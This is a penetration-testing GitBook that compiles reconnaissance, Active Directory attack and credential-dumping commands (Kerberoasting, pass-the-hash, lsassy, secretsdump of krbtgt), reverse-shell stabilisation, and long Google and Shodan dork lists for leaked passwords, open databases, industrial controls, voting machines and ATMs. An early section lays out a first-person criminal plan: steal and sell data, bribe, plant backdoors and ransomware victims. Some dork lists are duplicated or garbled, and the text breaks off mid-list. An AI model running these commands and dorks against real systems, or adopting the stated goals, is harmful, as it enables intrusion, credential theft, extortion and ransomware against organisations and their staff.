1 of 100

RED Squad [en]

/home/red-squad

Introduction

`whoami`

Welcome to our GitBook, a meticulously curated repository crafted by two dedicated young penetration testers. Our mission is to compile a comprehensive inventory of the tools, techniques, and knowledge we've amassed in the realms of cybersecurity, penetration testing, and red teaming over the recent years.

As we navigate the evolving landscape of digital security, we commit to regularly updating this GitBook with fresh insights gleaned from the front lines of our professional challenges. Here, you will discover a spectrum of strategies, from foundational concepts to sophisticated methodologies, all of which have been battle-tested in our day-to-day operations and honed through countless Capture The Flag (CTF) exercises.

Join us on this journey of continuous learning and discovery, where each page turn equips you with knowledge and empowers your cybersecurity endeavors.

⬆ Don't forget to support our projects and to BuyUsACoffee ⬆

Recently Added

Support our projects

Is There Life After Death ?

After compromising an infrastructure, web app, what is next ?

The MITRE ATT&CK resource is a good starting point. The end result of the attack will look a bit different based on the goal of the bad actor. The goal might be to :

Steal sensitive company/client/employee information, ransom, breaking/DoS applications,
Defacement for financial/reputation loss.

Regardless of the goal, I would start with discovery if I'm already inside the infrastructure/app.
This would allow me to check what other systems are within the infrastructure (and later try to exploit them).
For the app :
I would check what data it has/gathers.
If the app is based on micro-services,
What additional data I could gather from other systems/ apps.
Dump IT ALL :
I would download everything I gain access to. That might be user data or employee data,
If I gained access to an employee's PC I would download everything they have there and everything they have access to like data, emails, personal pics, and so on.
I would then analyze the data to see if there is anything I can sell, bribe for, and any details that would open other attack vectors (phishing, spear phishing, whaling, access/info about other systems, etc.).
After the discovery part is done, I would try to gain access to other systems as lateral movement and do again the first and second step when I'm in.
How would I get it?
Based on the data I've obtained when doing the discovery part I might've found some vulnerable systems, old systems with existing CVE's or just found some credentials on the employee computer.
Privilege Escalation
This could be done by using vulnerabilities in old systems, stealing tokens, modifying the app to steal and send details to remote systems, maybe creating some fake apps that look like internal apps and steal credentials, and so on.
Whatever I do next, I want to still have access to the app/infrastructure so I would start placing backdoors, reverse shells, creating admin accounts, having open sessions to the employee like RDP, and maybe leave open ssh tunnels.
The last step
It would be different depending on my goal.
If this is only money or destruction I would ransomware the hell out of them, systems, databases, user data, employee data, and pretty much everything that I had access to.
If I want to just steal data, I would not do anything destructive and stay in low profile to have the data coming in until they notice it and try to cut me off. I would deface their sites to show off or promote myself.

Web Hacking

CTFs shortcuts

Find flag

# if the flag looks like : flag{*****}
grep -irl flag{ $path

# if the flag is a .txt file
find / -iname "*.txt" 2>/dev/null
find / -iname "config.php" 2>/dev/null
find / -iname "flag.txt" 2>/dev/null

# find presence of chrootkit
find / -type f -name chkrootkit 2>/dev/null

Web Dev

Mozilla Firefox

CTRL + SHIFT + I

HTTP Headers Response

curl -sSL -D - $ip -o /dev/null
curl -s -I -X POST http://$ip

Stabilize Reverse shell

use CTRL + C

# In reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In OS
stty raw -echo
fg

There's three popular ways I use to stabilize a reverse shell;

Python, as mentioned above.
riwrap, which prepends to a netcat shell for additional terminal features.
Socat, which is a step above netcat but must be manually transferred over and launched on the target machine.

Audits plan

Exposition Audit - Plan

The objective is to define the attack surface of a company, mainly made up of all the elements of its information system exposed on the Internet.

Reconnaissance

Have your target organization name
- domain.example > person > e-mail -> GO
- Get these IP blocs that belongs to the company

Subdomains find

Google Dorks

site:domain.example -www

Tools

shodan

# install
pip install shodan
# usage
shodan domain domain.example

OneForAll

git clone https://github.com/shmilylty/OneForAll.git
cd OneForAll
pip3 install -r requirements.txt

# usage
python3 oneforall.py --target domain.example run

subfinder

# install 
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

# usage
subfinder -d domain.example -o domain-sub

Scans

IP2FQDN

dig +short ptr $ip.in-addr.arpa

nmap

# for each ip bloc :
blocip=0.0.0.0
filename=$(echo $blocip | tr '/' '-')
nmap -sn -v $blocip -oA ./${filename}_up --min-rate 1000
grep Up ${filename}_up.gnmap | awk '{print $2}' > ip-up-${filename}.txt
nmap -p- --open -sV -Pn -sT -v -iL ip-up-${filename}.txt -oA ./${filename}-full-scan --min-rate 1000

Visualize hosts

gowitness

Get a capture of each web service

gowitness file -f web.txt
gowitness report serve -a 127.0.0.1:7171

External Audit - Plan

'''
Black Box
'''
# Network
nmap -A -p- -Pn -f $target -oN scan
nmap -sC -sV -p- $target -oN scan
# or
rustscan -a $target -- -sC -sV -oN scan

# identify technologies / CMS -> check for vulnerabilities

# whois
whois $target

# Google Dorking (infos leak)
site:$target filetype:txt
site:$target filetype:pdf
site:$target intext:admin
site:$target inurl:admin

# Accounts Leaks : intelx.io 

# Reconnaissance
gospider -q -c 10 -s "http://$target"
# wappalyzer / identify versions
# read source code of webpages / finds keys / hidden endpoints

# WEB APP
nikto -h $target

# Fuzzing
feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster
# or
wfuzz -w /usr/share/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -u https://0.0.0.0/FUZZ --hw $hw -p $proxy

# TLS / HSTS
./testssl.sh $target
# burp suite > server response > hsts ? 
# info leak in headers ?

# HTTP parameters
arjun -u $url

'''
Grey Box
'''
# COOKIES
## Secure, HTTPOnly flags
## session fixation

# Inputs : SQLi / XSS / CSRF / SSRF / SSTI / OS Injection

# FUNCTIONALITIES 
#       logout / session timeout ? if the session is properly killed after logout.
#	password change, weak pass ?
#       IDOR  / Improper Isolation or Compartmentalization :
#	    access URI functionalities with no auth / no privileges
#       Uploads : eicar / file uploads bypass / lfi ?
#       zipslip / CSV injection

OSINT

🕵️ OSINT

Open-source intelligence (OSINT) is the collection and analysis of data gathered from open sources (covert sources and publicly available information [PAI]) to produce actionable intelligence. OSINT is primarily used in national security, law enforcement, and business intelligence functions and is of value to analysts who use non-sensitive intelligence in answering classified, unclassified, or proprietary intelligence requirements across the previous intelligence disciplines.

OSINT sources can be divided up into six different categories of information flow:

Media, print newspapers, magazines, radio, and television from across and between countries.
Internet, online publications, blogs, discussion groups, citizen media (i.e. – cell phone videos, and user created content), YouTube, and other social media websites (i.e. – Facebook, Twitter, Instagram, etc.). This source also outpaces a variety of other sources due to its timeliness and ease of access.
Public government data, public government reports, budgets, hearings, telephone directories, press conferences, websites, and speeches. Although this source comes from an official source they are publicly accessible and may be used openly and freely.
Professional and academic publications, information acquired from journals, conferences, symposia, academic papers, dissertations, and theses.
Commercial data, commercial imagery, financial and industrial assessments, and databases.
Grey literature, technical reports, preprints, patents, working papers, business documents, unpublished works, and newsletters.

OSINT is distinguished from research in that it applies the process of intelligence to create tailored knowledge supportive of a specific decision by a specific individual or group.

Ressources

Search Engines

Metasearch Engines and Search Engines:

Online Services

Utilities

User OSINT

Everything

Usernames

Services:

Utils

Passwords

HIBP API keys

Get emails of company with LinkedIn

# LinkedinMama3 - https://github.com/h0useh3ad/LinkedinMama3
git clone https://github.com/h0useh3ad/LinkedinMama3.git
cd LinkedinMama3/
pip3 install -r requirements.txt

python3 LinkedinMama3.py -k $company_name -e $company_domain -n $email_format -c $linkedin_company_ID

# check if some are pwned - https://github.com/thewhiteh4t/pwnedOrNot
git clone https://github.com/thewhiteh4t/pwnedOrNot.git
cd pwnedOrNot/
chmod +x install.sh
./install.sh

nano config.json # add hibp api key
python3 pwnedornot.py -f mails-list.txt

Search by Phone number

Utils:

Domains, IP, IOT

Search by Internet of Things, IP, Domains, and Subdomains

Services:

Utils

Business OSINT

Methodology

https://techjournalism.medium.com/osint-checklist-for-company-investigations-86c3752c095d" %}

IP addresses

FInd public infos about the enterprise :
2. Other countries : search for "registre de commerce" "commercial register"

Physical

Search Engine Queries - Locations
“company_name” headquarters address
“company_name” branch office
“city state” county

People

site:bizjournals.com inurl:potm “company_name“
site:linkedin.com “company_name” “present (1 month)”

Leaks / DNS

TOR network

Search in the TOR Network

Services

Utilities

Enumeration

Enumeration is Key

HTTP Stuff

Sessions / Tokens

Web Vulnerabilities

Files / Upload

Server-Side Vulnerabilities

Linux Hacking

Windows Hacking

Kerberos

Internal Audit - Plan

Network discovery

Scanning

# check what infos you can see
wireshark

# nmap
# BEST - https://miloserdov.org/?p=5248
# discover
sudo nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oX nmap_output.xml $network_ip
# extract the hosts
grep -A 2 'up' nmap_output.xml | grep -E -o '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > hosts.txt
# scan them, find routers
sudo nmap -v -PE -n --min-hostgroup 1024 --min-parallelism 1024 -p 80,443,8080,1080 --open -iL hosts.txt -oX nmap_routers.xml

# OTHERS
# Ping discovery, Top 20, fragment packets, no DNS resolution
nmap -v --top-ports 20 $ip/24 -f -n --open -oA
# Ping discovery, Top 200, fragment packets, no DNS resolution, service version
nmap -v --top-ports 200 $ip/24 -f -n -sV --open -oA
# Top 1000, fragment packets, no DNS resolution, service version, all alive (no ping)
nmap -v --top-ports 1000 $ip/24 -f -n -sV -Pn --open -oA

Windows AD

If you have no credentials

# Get domain name
cme smb 10.10.10.10
smbmap -H $dc_ip -u '' -p ''

# Detect SMB on network
responder-RunFinger -i X.X.X.0/24

# Find DC
nslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'

# Enumerate DC
ldapsearch -h <DC.IP> -x -s base namingcontexts

# Check for null session, if got users go for ASREPRoast with GetNPUsers
ldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"

# Get hashes with no krb preauth
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
GetNPUsers.py 'DC.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.10

# Get Users List
GetADUsers.py DC.local/ -dc-ip $dc_ip -debug

# Get Users from ldap
windapsearch -U — full — dc-ip $dc_ip

# Get base domain
ldapsearch -x -h $dc_ip -s base namingcontexts

# Get more info from DC
ldapsearch -x -h $dc_ip -b ‘DC=DCNAME,DC=LOCAL’

# User Domain info
Get-ADUser $name

# Forest info
Get-ADForest

# Get all computers in the current domain
Get-NetComputer

Kerberos

# Kerberoasting (hashcat 13100)
GetUserSPNs.py -request -save -dc-ip <IP> domain/user # hashcat 13100

# Bruteforce usernames and passwords with kerbrute
kerbrute.py -d <DC.LOCAL> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

# ASREPRoast (hashcat 18200)
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# PTH/PTK
# Request ticket
getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
getTGT.py <domain_name>/<user_name>:[password]
# Set ticket
export KRB5CCNAME=<TGT_ccache_file>
# Use it
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
psexec.py -hashes 'hash' -dc-ip 10.10.10.10 username@10.10.10.10
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

If you have credentials

# Enum AD AIO
# https://github.com/CasperGN/ActiveDirectoryEnumeration
python3 -m ade --dc <domain.name> -u <user@domain.name> --help
# https://github.com/adrecon/ADRecon from Windows on Domain

# windapsearch
# https://github.com/ropnop/go-windapsearch
windapsearch -d <domain>.<name> -u <user> -p <password> --help

# LDAP
# best tool : ldeep - https://github.com/franc-pentest/ldeep
ldeep ldap -u <USER> -p <PASSWORD> -d <DOMAIN> -s ldap://<DC_IP_OR_LDAP_SERV> all ldap_dump_

# Domain users
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(&(objectClass=user)(objectCategory=person))" name sAMAccountName userPrincipalName memberOf primaryGroupID adminCount userAccountControl description servicePrincipalName objectSid pwdLastSet lastLogon -E pr=1000/noprompt | tee domain_users.txt

# Domain computers
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=computer)" name dNSHostname memberOf operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName description userAccountControl | tee domain_computers.txt

# Domain groups
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=group)" name sAMAccountName memberOf member description objectSid | tee domain_groups.txt

# RPClient - enumeration users, groups, ...
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c dsr_enumtrustdom
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomains
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomusers
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomgroups

# CME
# Run commands
# can you access sensitive shares ? check for SYSVOL
cme smb <IP> -u <USER> -p '<PASS>' --shares

# PS
cme smb <IP> -u <USER> -p '<PASS>' -X 'Get-Host'
# CMD
cme smb <IP> -u <USER> -p '<PASS>' -x whoami
# PTH
cme smb <IP> -u <USER> -H <NTHASH> -x whoami
# Other methods
cme smb <IP> -u <USER> -p '<PASS>' --exec-method {mmcexec,smbexec,atexec,wmiexec}

# Dumps
# LSASSY
cme smb <IP> -d <DOMAIN> -u <USER> -p <PASS> -M lsassy
# SAM
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sam
# LSA
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --lsa
# Sessions
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sessions
# Logged users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --loggedon-users
# Disks
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --disks
# Users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --users #Enumerate users
# Groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --groups
# Local groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --local-groups
# Password policy
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --pass-pol

Dumps secrets

# User hash
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user user1

# krbtgt hash dump -> Golden Ticket
secretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user krbtgt

Local Privilege Escalation

Juicy Potato

Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation

Works only until Windows Server 2016 and Windows 10 until patch 1803.

PrintSpoofer

Exploit the PrinterBug for System Impersonation

Works for Windows Server 2019 and Windows 10.

RoguePotato

From Service Account to System

Works for Windows Server 2019 and Windows 10.

Abusing Token Privileges

SMBGhost CVE-2020–0796

CVE-2021–36934 (HiveNightmare/SeriousSAM)

Linux

Lynis

Lynis is a battle-tested security tool for systems running Linux, macOS, or Unix-based operating system. It performs an extensive health scan of your systems to support system hardening and compliance testing.

In order to install Lynis on your system, you must follow these steps :

git clone https://github.com/CISOfy/lynis.git
cd lynis
./lynis audit system -Q

Breaches/Leaks

🗣️ Breaches/Leaks

🗣 Breaches

Usage : https://psbdmp.ws/api/search/<email>

Usage https://cavalier.hudsonrock.com/api/json...@email.com =======
Usage https://cavalier.hudsonrock.com/api/json...@email.com

Tools

Pastebins

Investigate - Verify Leak Data

https://techjournalism.medium.com/how-to-verify-leak-data-3b0c8d8b764a

Metadata

Tools :

Automate the collection of metadata, collect creation dates and store it for analysis in chronological order :

import fitz
from datetime import datetime

def extract_creation_date(pdf_path):
    with fitz.open(pdf_path) as doc:
        try:
            creation_date = doc.metadata.get("creationDate")
            if creation_date:
                creation_date = datetime.strptime(creation_date[2:16], "%Y%m%d%H%M%S")
                return creation_date
            else:
                return None
        except Exception as e:
            print(f"Error extracting creation date from {pdf_path}: {e}")
            return None

if __name__ == "__main__":
    pdf_paths = ["file1.pdf", "file2.pdf", "file3.pdf"]
    creation_dates = []
    for path in pdf_paths:
        creation_date = extract_creation_date(path)
        if creation_date:
            creation_dates.append((path, creation_date))
    
    creation_dates.sort(key=lambda x: x[1])
    print("PDF Creation Dates (in chronological order):")
    for i, (pdf_path, date) in enumerate(creation_dates, start=1):
        print(f"{i}. {pdf_path} - {date}")

Virus scan - You never know

- Runs two different virus scan software packages.
  - If the data runs on an external hard drive, check virus/malware on that dump of data as a whole.

Check photos/graphs

Signatures (pen)

Word-Doc

# install
git clone https://github.com/urbanadventurer/WhatWeb.git
cd WhatWeb
make install

# usage
# Default scan
whatweb $ip

# Scan the local network quickly and suppress errors
whatweb --no-errors $network

whatweb --aggression=Stealthy/Aggressive/Heavy --verbose 

# Scan reddit.com slashdot.org with verbose plugin descriptions
whatweb -v reddit.com slashdot.org

# An aggressive scan of wired.com detects the exact version of WordPress.
whatweb -a 3 www.wired.com

# Scan the local network for https websites
whatweb --no-errors --url-prefix https:// $network

Dorks

Working with Dorks

Online Services:

Apps

Google

Google hacking, also named Google Dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google dorking could also be used for OSINT.

Disclaimer: It is highly advised that you use the information you find for legal purposes only. The unauthorized access of information can lead to a criminal proceeding against you. So use Google hacking with care (and written permission).

Tools

metagoofil

# install
git clone https://github.com/opsdisk/metagoofil
cd metagoofil
pip install -r requirements.txt

# usage
python3 metagoofil.py -d domain.com -t doc -l 50 -n 50 -o /tmp/result -f /tmp/result/result.html -u

Base

Links

OPERATOR

DESCRIPTION

EXAMPLE

intitle:

which finds strings in the title of a page

intitle:”Your Text”

allintext:

which finds all terms in the title of a page

allintext:”Contact”

inurl:

which finds strings in the URL of a page

inurl:”news.php?id=”

site:

which restricts a search to a particular site or domain

site:yeahhub.com “Keyword”

filetype:

which finds specific types of files (doc, pdf, mp3 etc) based on file extension

filetype:pdf “Cryptography”

link:

which searches for all links to a site or URL

link:”example.com”

cache:

which displays Google’s cached copy of a page

cache:yeahhub.com

info:

which displays summary information about a page

Sensitive Directories

intitle:" index of "/Invoices*"
intitle:"index of" ".env"
intitle:"index of" "/configs"

Vulnerable Websites

intitle:"index of" "*.php"
intitle:"index of" "*.py"
intitle:"index of" "*.sh"
intitle:"index of" "schema.sql"
inurl: database

inurl:php?=id1
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num= andinurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=

Juicy Files

inurl:admin filetype:xls
intitle:"index of" "/mysql"
site:.edu intext:"index of" "payroll"
inurl:edu “login”

intext:”budget approved”) inurl:confidential
ext:inc "pwd=" "UID="
ext:ini intext:env.ini
ext:ini Version=... password
ext:ini Version=4.0.0.4 password
ext:ini eudora.ini
ext:ini intext:env.ini
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log "Software: Microsoft Internet Information
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb   inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
filetype:SWF SWF
filetype:TXT TXT
filetype:XLS XLS
filetype:asp   DBQ=" * Server.MapPath("*.mdb")
filetype:asp "Custom Error Message" Category Source
filetype:asp + "[ODBC SQL"
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:asp DBQ=" * Server.MapPath("*.mdb") 
filetype:asp “Custom Error Message” Category Source
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:bak inurl:"htaccess|passwd|shadow|htusers" 
filetype:conf inurl:firewall -intitle:cvs 
filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
filetype:dat "password.dat
filetype:dat "password.dat" 
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To" 
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:inc dbconn 
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect 
filetype:log inurl:"password.log"
filetype:log username putty PUTTY SSH client logs can reveal usernames
filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
filetype:mdb inurl:users.mdb
filetype:ora ora
filetype:ora tnsnames
filetype:pass pass intext:userid
filetype:pdf "Assessment Report" nessus
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" 
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
filetype:reg reg HKEY_ Windows Registry exports can reveal
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql ("passwd values" | "password values" | "pass values" ) 
filetype:sql ("values * MD" | "values * password" | "values * encrypt") 
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:sql password 
filetype:sql “insert into” (pass|passwd|password)
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:url +inurl:"ftp://" +inurl:";@" 
filetype:url +inurl:”ftp://” +inurl:”;@”
filetype:xls inurl:"email.xls"
filetype:xls username password email
index of: intext:Gallery in Configuration mode
index.of passlist
index.of perform.ini mIRC IRC ini file can list IRC usernames and
index.of.dcim 
index.of.password 
intext:" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
intext:"#mysql dump" filetype:sql
intext:"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
intext:"A syntax error has occurred" filetype:ihtml
intext:"ASP.NET_SessionId" "data source="
intext:"About Mac OS Personal Web Sharing"
intext:"An illegal character has been found in the statement" -"previous message"
intext:"AutoCreate=TRUE password=*"
intext:"Can't connect to local" intitle:warning
intext:"Certificate Practice Statement" filetype:PDF | DOC
intext:"Certificate Practice Statement" inurl:(PDF | DOC)
intext:"Copyright (c) Tektronix, Inc." "printer status"
intext:"Copyright © Tektronix, Inc." "printer status"
intext:"Emergisoft web applications are a part of our"
intext:"Error Diagnostic Information" intitle:"Error Occurred While"
intext:"Error Message : Error loading required libraries."
intext:"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
intext:"Fatal error: Call to undefined function" -reply -the -next
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Generated   by phpSystem"
intext:"Generated by phpSystem"
intext:"Host Vulnerability Summary Report"
intext:"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
intext:"IMail Server Web Messaging" intitle:login
intext:"Incorrect syntax near"
intext:"Index of" /"chat/logs"
intext:"Index of /network" "last modified"
intext:"Index of /" +.htaccess
intext:"Index of /" +passwd
intext:"Index of /" +password.txt
intext:"Index of /admin"
intext:"Index of /backup"
intext:"Index of /mail"
intext:"Index of /password"
intext:"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
intext:"Microsoft CRM : Unsupported Browser Version"
intext:"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
intext:"Network Host Assessment Report" "Internet Scanner"
intext:"Network Vulnerability   Assessment Report"
intext:"Network Vulnerability Assessment Report"
intext:"Network Vulnerability Assessment Report" 本文来自 pc007.com
intext:"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
intext:"Thank you for your order"   +receipt
intext:"Thank you for your order" +receipt
intext:"Thank you for your purchase" +download
intext:"The following report contains confidential information" vulnerability -search
intext:"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"
intext:"phpMyAdmin MySQL-Dump" filetype:txt
intext:"phpMyAdmin" "running on" inurl:"main.php"
intextpassword | passcode)   intextusername | userid | user) filetype:csv
intextpassword | passcode) intextusername | userid | user) filetype:csv
intitle:"index of" +myd size
intitle:"index of" etc/shadow
intitle:"index of" htpasswd
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"index of" master.passwd
intitle:"index of" master.passwd 007电脑资讯
intitle:"index of" members OR accounts
intitle:"index of" mysql.conf OR mysql_config
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" spwd
intitle:"index of" user_carts OR user_cart
intitle:"index.of *" admin news.asp configview.asp
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
inurl:admin inurl:userlist Generic userlist files

Database

Shodan

Resources

Basic

port: Search by specific port

net: Search based on an IP/CIDR

hostname: Locate devices by hostname

os: Search by Operating System

city: Locate devices by city

country: Locate devices by country

geo: Locate devices by coordinates

org: Search by organization

before/after: Timeframe delimiter

hash: Search based on banner hash

has_screenshot:true Filter search based on a screenshot being present

title: Search based on text within the title

asn: Search ASN e.g. 'AS12345'

ssl.jarm: Search by JARM fingerprint

Examples

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

org:microsoft 
org:"United States Department"

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

device:firewall 
device:router 
device:wap 
device:webcam 
device:media 
device:"broadband router" 
device:pbx 
device:printer 
device:switch 
device:storage 
device:specialized 
device:phone 
device:"voip" 
device:"voip phone" 
device:"voip adaptor" 
device:"load balancer" 
device:"print server" 
device:terminal 
device:remote 
device:telecom 
device:power 
device:proxy 
device:pda 
device:bridge

Operating System

os:"windows 7" 
os:"windows server 2012"
os:"linux 3.x"

Product

product:apache 
product:nginx 
product:android 
product:chromecast

Customer Premises Equipment (CPE)

cpe:apple 
cpe:microsoft 
cpe:nginx 
cpe:cisco

Server

server: nginx 
server: apache 
server: microsoft 
server: cisco-ios

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Dorks

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Databases

MySQL

"product:MySQL"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK"

Kibana dashboards without authentication

kibana content-legth:217

elastic

port:9200 json port:"9200" all:elastic

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal.\ "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM Access availability NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

